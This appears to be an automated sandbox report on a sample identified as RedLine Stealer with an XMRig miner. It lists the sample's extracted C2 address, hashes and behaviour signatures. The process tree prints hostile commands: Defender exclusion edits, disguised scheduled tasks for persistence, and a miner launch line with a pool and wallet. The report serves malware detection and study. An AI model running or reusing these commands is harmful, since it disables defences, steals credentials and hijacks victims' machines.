Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2022, 06:26

General

  • Target

    ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe

  • Size

    12.7MB

  • MD5

    73da708b6e7cb62ed7a8dbfb82248915

  • SHA1

    736532c733926259633b1f3c1fef02f623c68445

  • SHA256

    ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46

  • SHA512

    f7e449390017aba0828d8b1e526aa19bf37902ebaae7983e3cdacb44414d8882315e3b0c873408cc1932d21125bdd59986fbeb413f1ea1d17551d9dfa13df19c

  • SSDEEP

    393216:YXmmhVLcncVXz1UBS8bbLSvxgoKZGuriqRxQuYf:e+a1+vLpoKYurdfe

Malware Config

Extracted

Family

redline

C2

185.215.113.69:15544

Attributes
  • auth_value

    1372cd9fae57c6645ea8737ff631eb3c

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 10 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe
    "C:\Users\Admin\AppData\Local\Temp\ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Windows\SysWOW64\Updater.exe
      "C:\Windows\system32\Updater.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Users\Admin\AppData\Local\Temp\System.exe
          "C:\Users\Admin\AppData\Local\Temp\System.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3144
            • C:\Windows\SysWOW64\chcp.com
              chcp 1251
              6⤵
                PID:2212
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1756
            • C:\ProgramData\Dllhost\dllhost.exe
              "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4504
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                6⤵
                  PID:3940
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                    7⤵
                    • Creates scheduled task(s)
                    PID:4204
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  6⤵
                    PID:4948
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                      7⤵
                      • Creates scheduled task(s)
                      PID:4236
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                    6⤵
                      PID:4808
                      • C:\Windows\SysWOW64\schtasks.exe
                        SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                        7⤵
                        • Creates scheduled task(s)
                        PID:444
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                      6⤵
                        PID:4540
                        • C:\Windows\SysWOW64\schtasks.exe
                          SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                          7⤵
                          • Creates scheduled task(s)
                          PID:2140
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                        6⤵
                          PID:4244
                          • C:\Windows\SysWOW64\schtasks.exe
                            SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            7⤵
                            • Creates scheduled task(s)
                            PID:1332
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                          6⤵
                            PID:1564
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            6⤵
                              PID:1644
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                7⤵
                                • Creates scheduled task(s)
                                PID:2840
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk5408" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                              6⤵
                                PID:3936
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk5408" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  7⤵
                                  • Creates scheduled task(s)
                                  PID:3104
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                6⤵
                                  PID:1152
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                    7⤵
                                    • Creates scheduled task(s)
                                    PID:448
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk3835" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  6⤵
                                    PID:3180
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk3835" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                      7⤵
                                      • Creates scheduled task(s)
                                      PID:4616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk356" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                    6⤵
                                      PID:4840
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk356" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                        7⤵
                                        • Creates scheduled task(s)
                                        PID:4640
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk6583" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                      6⤵
                                        PID:4724
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk6583" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:1648
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
                                        6⤵
                                          PID:2760
                                          • C:\Windows\SysWOW64\chcp.com
                                            chcp 1251
                                            7⤵
                                              PID:1680
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
                                            6⤵
                                              PID:1276
                                              • C:\Windows\SysWOW64\chcp.com
                                                chcp 1251
                                                7⤵
                                                  PID:3696
                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  C:\ProgramData\Dllhost\winlogson.exe -c config.json
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4892
                                      • C:\Windows\SysWOW64\Setup.exe
                                        "C:\Windows\system32\Setup.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:788
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 3 /tn "MicrosoftEdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\DataSellSetupMutex\RegVBS.exe.exe" /f
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:2064
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe --algo rx/0 --donate-level 0 --max-cpu-usage 60 -oxmr-eu1.nanopool.org:14444 -u 42CqPp3vCd3EurYa4S5wYdFJzNFEtgwc7VmmGzq4BQtz7rWKxVyjQQ8hFvB4P49FmCeLu8NrfN5t1S8oCbkaaVd34YvGvQN
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2056
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 788 -s 1456
                                          3⤵
                                          • Program crash
                                          PID:4144
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -pss -s 408 -p 788 -ip 788
                                      1⤵
                                        PID:5044

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\Dllhost\dllhost.exe

                                        Filesize

                                        60KB

                                        MD5

                                        8eac424b39ecd7724237708242536dce

                                        SHA1

                                        dbd058d840422fcaaf1d6897564e73be3641f7d3

                                        SHA256

                                        a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229

                                        SHA512

                                        1ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa

                                      • C:\ProgramData\Dllhost\dllhost.exe

                                        Filesize

                                        60KB

                                        MD5

                                        8eac424b39ecd7724237708242536dce

                                        SHA1

                                        dbd058d840422fcaaf1d6897564e73be3641f7d3

                                        SHA256

                                        a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229

                                        SHA512

                                        1ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa

                                      • C:\ProgramData\Dllhost\winlogson.exe

                                        Filesize

                                        7.8MB

                                        MD5

                                        6f4532e49d65c2be0355b222f96e06e8

                                        SHA1

                                        268e90ce25e01bbb205f6ae3f493f8da36a61480

                                        SHA256

                                        acaf8e844ef7f4f65033ebe9546c394cc21bce175dac8b59199106309f04e5ab

                                        SHA512

                                        85f495b0bbd0673df376f44e912f9a0a8d201c2843f1a9efa64d93703a2d8ba2b6fa2638a747e79604715d26ddfc07de26ba43d03adf86290d928b442bf09207

                                      • C:\ProgramData\SystemFiles\config.json

                                        Filesize

                                        315B

                                        MD5

                                        c465700b27e8387849ca1e4ef9b115cf

                                        SHA1

                                        139398a2136c7c40cfb48385d0a48bde89d6b94c

                                        SHA256

                                        e2afe75858da3d4d9cebb3303bd671f90863d82e447c5a9a195b9d90a39cb067

                                        SHA512

                                        7dd6d8ee2ed46e5d83ecc7a85ef0734e56e8564d5a2c5778ae656e5953e55ff9781c0a9df5739ab7601d3801ae6711c06248955c97d3e8d1ac29c51fe2661b93

                                      • C:\ProgramData\SystemFiles\sys_rh.bin

                                        Filesize

                                        1KB

                                        MD5

                                        9d06a9235fdb2d61f92103c8d690b134

                                        SHA1

                                        087dff70c2f5b647983abe9f668a1704a0574a45

                                        SHA256

                                        bbd04cc6634065ee1bac547c611a86d5a9108fc97cd15d2fa4037c8977018353

                                        SHA512

                                        501dff9f99d0454fda6fd1a2676299edec682df1888fd1270b9b90bc90978aa1447b5f863df663cec63fa9e3d0e57a1a0117b9cd41d10a07b7f8518afccbdf61

                                      • C:\Users\Admin\AppData\Local\Temp\System.exe

                                        Filesize

                                        56KB

                                        MD5

                                        139cd19f65a027137d58a8845a894d62

                                        SHA1

                                        bad5bc463d84d49ab5dc1dd6afa7be100a30ba47

                                        SHA256

                                        00a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6

                                        SHA512

                                        7a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e

                                      • C:\Users\Admin\AppData\Local\Temp\System.exe

                                        Filesize

                                        56KB

                                        MD5

                                        139cd19f65a027137d58a8845a894d62

                                        SHA1

                                        bad5bc463d84d49ab5dc1dd6afa7be100a30ba47

                                        SHA256

                                        00a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6

                                        SHA512

                                        7a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e

                                      • C:\Windows\SysWOW64\Setup.exe

                                        Filesize

                                        11.1MB

                                        MD5

                                        7aa0deb8925c933c29ee5fdc02d50468

                                        SHA1

                                        8fc02b2c924dc1495f5658e3d9598bcbdeced726

                                        SHA256

                                        9fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6

                                        SHA512

                                        ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32

                                      • C:\Windows\SysWOW64\Setup.exe

                                        Filesize

                                        11.1MB

                                        MD5

                                        7aa0deb8925c933c29ee5fdc02d50468

                                        SHA1

                                        8fc02b2c924dc1495f5658e3d9598bcbdeced726

                                        SHA256

                                        9fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6

                                        SHA512

                                        ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32

                                      • C:\Windows\SysWOW64\Updater.exe

                                        Filesize

                                        2.4MB

                                        MD5

                                        37947dda264ac7fc5b1dc64fad3fa9a0

                                        SHA1

                                        cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c

                                        SHA256

                                        0144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057

                                        SHA512

                                        6e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147

                                      • C:\Windows\SysWOW64\Updater.exe

                                        Filesize

                                        2.4MB

                                        MD5

                                        37947dda264ac7fc5b1dc64fad3fa9a0

                                        SHA1

                                        cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c

                                        SHA256

                                        0144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057

                                        SHA512

                                        6e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147

                                      • memory/788-152-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/788-150-0x0000000000850000-0x0000000001378000-memory.dmp

                                        Filesize

                                        11.2MB

                                      • memory/788-151-0x0000000003360000-0x0000000003372000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/788-165-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1756-223-0x0000000007B20000-0x0000000007B3A000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/1756-180-0x0000000002F50000-0x0000000002F86000-memory.dmp

                                        Filesize

                                        216KB

                                      • memory/1756-187-0x0000000006A70000-0x0000000006A8E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/1756-186-0x0000000073200000-0x000000007324C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/1756-214-0x0000000007A80000-0x0000000007B16000-memory.dmp

                                        Filesize

                                        600KB

                                      • memory/1756-185-0x0000000006A90000-0x0000000006AC2000-memory.dmp

                                        Filesize

                                        200KB

                                      • memory/1756-184-0x00000000064D0000-0x00000000064EE000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/1756-183-0x0000000005590000-0x00000000055F6000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/1756-182-0x00000000053F0000-0x0000000005412000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1756-181-0x0000000005770000-0x0000000005D98000-memory.dmp

                                        Filesize

                                        6.2MB

                                      • memory/1756-222-0x0000000007A20000-0x0000000007A2E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/1756-188-0x0000000007E60000-0x00000000084DA000-memory.dmp

                                        Filesize

                                        6.5MB

                                      • memory/1756-224-0x0000000007A60000-0x0000000007A68000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1756-189-0x00000000077E0000-0x00000000077FA000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/1756-190-0x0000000007840000-0x000000000784A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2004-139-0x00000000005B0000-0x00000000005D8000-memory.dmp

                                        Filesize

                                        160KB

                                      • memory/2004-171-0x0000000006D00000-0x000000000722C000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/2004-161-0x0000000004D60000-0x0000000004D72000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/2004-170-0x0000000006600000-0x00000000067C2000-memory.dmp

                                        Filesize

                                        1.8MB

                                      • memory/2004-169-0x00000000058D0000-0x0000000005936000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/2004-168-0x0000000005E80000-0x0000000006424000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/2004-167-0x0000000005100000-0x0000000005192000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/2004-156-0x00000000052B0000-0x00000000058C8000-memory.dmp

                                        Filesize

                                        6.1MB

                                      • memory/2004-158-0x0000000004E30000-0x0000000004F3A000-memory.dmp

                                        Filesize

                                        1.0MB

                                      • memory/2004-163-0x0000000004DE0000-0x0000000004E1C000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/2056-159-0x0000000140000000-0x00000001407C9000-memory.dmp

                                        Filesize

                                        7.8MB

                                      • memory/2056-154-0x0000000140000000-0x00000001407C9000-memory.dmp

                                        Filesize

                                        7.8MB

                                      • memory/2056-160-0x0000027DD7120000-0x0000027DD7140000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2056-162-0x0000000140000000-0x00000001407C9000-memory.dmp

                                        Filesize

                                        7.8MB

                                      • memory/2056-157-0x0000000140000000-0x00000001407C9000-memory.dmp

                                        Filesize

                                        7.8MB

                                      • memory/2056-226-0x0000027E6B080000-0x0000027E6B0A0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2056-225-0x0000027E6B080000-0x0000027E6B0A0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2056-164-0x0000027E6AC30000-0x0000027E6AC50000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2056-166-0x0000000140000000-0x00000001407C9000-memory.dmp

                                        Filesize

                                        7.8MB

                                      • memory/2972-176-0x0000000005770000-0x000000000577A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2972-175-0x0000000000F30000-0x0000000000F44000-memory.dmp

                                        Filesize

                                        80KB

                                      • memory/4084-149-0x00000000772E0000-0x0000000077483000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/4084-148-0x0000000000400000-0x000000000147D000-memory.dmp

                                        Filesize

                                        16.5MB

                                      • memory/4084-132-0x0000000000400000-0x000000000147D000-memory.dmp

                                        Filesize

                                        16.5MB

                                      • memory/4084-133-0x00000000772E0000-0x0000000077483000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/4084-134-0x0000000000400000-0x000000000147D000-memory.dmp

                                        Filesize

                                        16.5MB

                                      • memory/4084-147-0x00000000772E0000-0x0000000077483000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/4504-194-0x0000000000D00000-0x0000000000D16000-memory.dmp

                                        Filesize

                                        88KB

                                      • memory/4892-231-0x0000020CB2110000-0x0000020CB2130000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4892-233-0x0000020CB2160000-0x0000020CB2180000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4892-234-0x0000020CB2160000-0x0000020CB2180000-memory.dmp

                                        Filesize

                                        128KB